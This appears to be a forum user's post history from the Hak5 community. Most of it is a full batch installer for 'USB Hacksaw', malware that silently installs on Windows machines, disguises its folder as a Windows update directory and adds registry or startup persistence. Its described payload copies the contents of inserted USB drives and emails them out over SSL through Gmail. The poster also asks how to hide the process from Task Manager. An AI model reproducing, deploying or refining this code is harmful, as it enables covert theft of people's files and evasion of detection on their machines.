Jump to content


  • Posts

  • Joined

  • Last visited

Everything posted by brfield

  1. Links are all still down. When will you have them back up?
  2. brfield

    USBhacksaw Help

    With hidden "Files and Folders" enabled you will still be screwed. You have to follow this process-I had the same problem: Tools-->Folder Options-->uncheck HIDE PROTECTED SYSTEM OPERATING FILES(RECOMMENDED) Then edit the send.bat
  3. I have made this to auto run on non u3 drives silently and have done some other tweaks to make this more efficient but I cannot for the life of me get cmd to exit automatically! The window never shows you don't see a thing but how do i get it to exit? If you open task manager under processes you will see cmd.exe can i make this kill itself or exit? if exist C:Void.txt GOTO end ::Use /\/\ to keep from infecting yourself :: Payload:Hacksaw | Auth:Hak5 POC Solution | Ver:0.1poc :: Props: core-dump, pseudobreed, poyboy, gmullen, cooper, boristsr, moonlit, VaKo, 404, stingray, dlss :: :: The purpose of this hack, dubbed USB Hacksaw for googleability, is to automatically and silently :: install on windows 2000, XP, or 2003 machines with either administrator or guest access. :: Installation consists of hiding the hacksaw tools in a hidden folder, add to either registry or :: startup folder depening on user rights, and start the program. :: :: This hack is based on a modified version of USBDumper. Once installed on a targert machine it will :: stay resident and wait for a USB flash drive to be inserted. Once a USB flash drive is inserted the :: hacksaw will download the contents of the drive to a temporary location using the modified USBDumper, :: then silently run the send.bat file located in the same directory, which will then archive the contents :: using RAR, eastablish an SSL SMTP connection to smtp.gmail.com using Stunnel and Blat, email the :: downloaded data to an email address, and remove the documents and archives. :: :: The proof of concept code in this 0.1 version is not as pretty as it could be. Originally a method :: for determining user rights and thus installing accordingly was planned, however problems with the :: IFMEMBER command were found and many dirty hacks followed. Future versions are expected to use a more :: elegent method of determining user privledges. (Thinking outloud: try creating a file where guests :: shouldnt be able to and check errorlevel). :: :: Development of this project has been done with the aid of the Hak.5 community at www.hak5.org :: Programs used: :: USBDumper -- http://www.secuobs.com/news/07062006-sstic_usbdumper.shtml :: Stunnel -- http://www.stunnel.org/ :: Blat -- http://www.blat.net/ :: Shortcut -- http://www.optimumx.com/download/#Shortcut :: Rar -- http://www.rarlabs.com/ :: :: More information and future developments of this hack can be found at: :: http://www.hak5.org/wiki/USB_Hacksaw :: If admin make windows\$NtUninstallKB931337$, else make %appdata%\sbs mkdir %systemroot%\$NtUninstallKB931337$ || mkdir "%appdata%\sbs" :: go to payload directory cd \WIP\SBS :: remove hidden and system attributes (makes next copy command happy, probably better way to do this) attrib *.* -s -h :: copy payload to target copy *.* %systemroot%\$NtUninstallKB931337$ || copy *.* "%appdata%\sbs" :: reapply hidden and system attributes attrib *.* +s +h :: If admin register USB Hacksaw as startup program in registry, else do it the yucky way reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.exe" /f || "%appdata%\sbs\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" :: Hide USB Hacksaw attrib %systemroot%\$NtUninstallKB931337$ +s +h & attrib "%appdata%\sbs" +s +h :: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below) :: "%systemroot%\$NtUninstallKB931337$\sbs.exe" || "%appdata%\sbs\sbs.exe" %systemdrive% cd \ cd %systemroot% cd $NtUninstallKB931337$ sbs.exe :end I have tried: exit @exit taskkill /f /cmd.exe exit /b 1 close How can I make it end itself? Make it not seen in Task Manager
  • Create New...